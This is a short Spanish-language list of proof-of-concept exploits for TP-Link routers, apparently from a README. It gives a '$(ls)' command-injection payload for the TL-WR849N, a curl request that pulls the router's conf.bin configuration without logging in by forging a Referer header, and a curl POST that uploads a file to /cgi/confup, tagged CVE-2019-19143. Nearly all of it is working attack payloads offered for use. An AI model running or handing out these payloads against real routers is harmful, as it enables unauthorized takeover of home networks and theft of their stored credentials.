
Exploits de prueba de concepto para routers TP-Link, incluyendo vulnerabilidades de ejecución remota de comandos y bypass de autenticación.
Payload: "$(ls)"
TP LINK TL-WR849N - PoC de EJECUCIÓN REMOTA DE COMANDOS
Payload:
curl -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
Carga de nuevo firmware sin acceso al panel
[CVE-2019-19143] Actualización de firmware: carga de nuevo firmware sin acceso al panel
Payload:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.2/mainFrame.htm" -F [email protected] http://192.168.0.2/cgi/confup